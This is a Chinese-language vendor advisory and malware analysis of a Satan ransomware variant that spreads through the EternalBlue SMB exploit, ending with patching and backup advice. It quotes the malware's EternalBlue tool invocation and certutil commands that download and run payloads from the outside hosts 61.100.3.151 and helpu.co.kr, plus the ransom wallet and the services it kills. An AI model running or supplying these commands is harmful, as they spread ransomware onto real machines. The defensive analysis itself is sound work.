Satan勒索病毒最新变种（TKING）预警

此病毒变种，利用永恒之蓝漏洞进行横向传播，重点针对数据库文件进行高强度的加密，并索取0.3个比特币作为赎金。

其攻击场景如下：

概述

勒索病毒运行后，病毒开始加密系统里的相关后缀名的文件为.satan后缀，然后在相应的目录生成勒索信息的TXT文件，如图所示：

病毒分析

母体样本分析st.exe

(1)从服务器上下载ms.exe（永恒之蓝工具包）和Client.exe（Satan勒索样本）并运行，运行后获取本地IP网段，然后利用永恒之蓝工具包里的组件发起攻击，感染其他主机，如下图所示：

下载运行之后，创建一个循环执行的线程，执行永恒之蓝攻击，如下图所示：

相应的攻击代码如下：

利用ShellExecute运行cmd.exe，执行

“/c cd /D C:\\Users\\Alluse~1\\&blue.exe --TargetIp IP地址 &

star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp IP地址”

永恒之蓝利用工具包分析ms.exe

(1)母体ms.exe是一个SFX自解压文件，运行之后，解压自身到C:\\Users\\All Users目录下，如下图所示：

(2)首先通过blue.exe进行IP段扫描，然后执行永恒之蓝SMB漏洞溢出攻击，如下图所示：

(3)永恒之蓝漏洞攻击成功之后，利用star.exe加载Payload(down64.dll)到攻击之后主机上运行ShellCode代码，然后通过网络去下载st.exe母体样本运行，如下图所示：

相关的shellcode代码如下图所示:

cmd.exe /c certutil.exe -urlcache -split -f http://61.100.3.151/data/log/st.exe c:/st.exe & c:\st.exe

它会从服务器61.100.3.151上下载st.exe母体进行执行，同时我调试发现了在down86.xll这个Payload上，下载的服务器地址发生了改变，如下图所示：

相关的命令如下：

cmd.exe /c certutil.exe -urlcache -split -f http://helpu.co.kr/down/st.exe c:/st.exe & c:\st.exe

通过查询这个域名，发现是一个韩国的网站，可能这个网站已经被黑客攻陷了，利用它来传播自己的木马和勒索样本，如下所示：

勒索样本分析client.exe

(1)从网上下载最新的Satan勒索病毒到用户C盘根目录，如下图所示：

下载更新的网址：http://61.100.3.151/data/notice.exe，下载之后如图所示：

(2)在C盘根目录生成勒索信息，如下图所示：

生成之后的勒索信息ReadMe_@.TXT文本内容为：

勒索信息提供了三种语言：英语、汉语、韩语

勒索BitCoin钱包地址：1BEDcx8n4PdydUNC4gcwLSbUCVksJSMuo8

联系邮件地址：satan_pro@mail.ru

(3)上传收集到的用户的机器信息，如下图所示：

(4)上传之后设置相应的注册表项，如下图所示：

(5)关闭相关的SQL服务，如下图所示：

关闭的SQL相关的服务如下：

MySQL、MySQLa、SQLWriter、SQLSERVERAGENT、MSSQLFDLauncher、MSSQLSERVER

(6)结束数据库相关的进程，如下图所示：

结束的进程列表如下：

sqlservr.exe、mysqld.exe、nmesrvc.exe、sqlagent.exe、fdhost.exe、fdlauncher.exe

reportingservicesservice.exe、omtsreco.exe、tnslsnr.exe、oracle.exe

emagent.exe、perl.exe、sqlwriter.exe、mysqld-nt.exe

(7)开始加密文件，当文件在以下目录下时，不加密文件，如图所示：

相应的目录列表：

windows、boot、i386、st_v2、intel、recycle、jdk、lib、lib、all users

360rec、360sec、360sand、favourites、common files、internet explorer

msbuild、public、360downloads

(8)Satan勒索主要是对数据库文件进行加密操作，判断文件后缀，如果后缀为如下列表：

mdf、ldf、myd、myi、frm、dbf、bak、sql、rar、zip、dmp

时，则加密相应的文件，如果后缀为如下列表：

cab、dll、msi、exe、lib、iso、bin、bmp、tmp、log、ocx、chm、dat、sys、wim、dic、sdi、lnk、gho、pbk

时，则不加密相应的文件，如下图所示：

(9)创建加密函数，对文件进行加密，如图所示：

加密文件，如图所示：

(10)最后通过ShellExecuteA执行之前下载更新的Satan勒索病毒样本，如图所示：

传播方式

这个勒索病毒主要通过邮件、漏洞、垃圾网站的方式进行传播，其自身不具备横向感染的能力，但其母体会通过永恒之蓝进行传播此病毒。

解决方案

对于企业用户，推荐采用深信服安全感知+NGAF+EDR的综合解决方案：

1.如果永恒之蓝攻击一旦从边界进入内网，此时属于内网横行传播，建议使用深信服安全感知来探测永恒之蓝攻击的移动情况和内网安全状况。

2.从近一段时间应急响应事件来看，攻击者大多是利用永恒之蓝漏洞入侵服务器，所以建议深信服下一代防火墙（NGAF）客户，及时更新规则库至最新版本，并开启安全防护，可轻松防御此高危风险。

3.深信服终端检测响应平台（EDR）提供端点防护和病毒清理功能，可以非常直接有效的清除相关病毒。

除此之外深信服提醒用户，日常防范措施：

1.不要点击来源不明的邮件附件，不从不明网站下载软件

2.及时给主机打上永恒之蓝漏洞补丁，修复此漏洞

3.对重要的数据文件定期进行非本地备份

4.尽量关闭不必要的文件共享权限以及关闭不必要的端口，如：445,135,139,3389等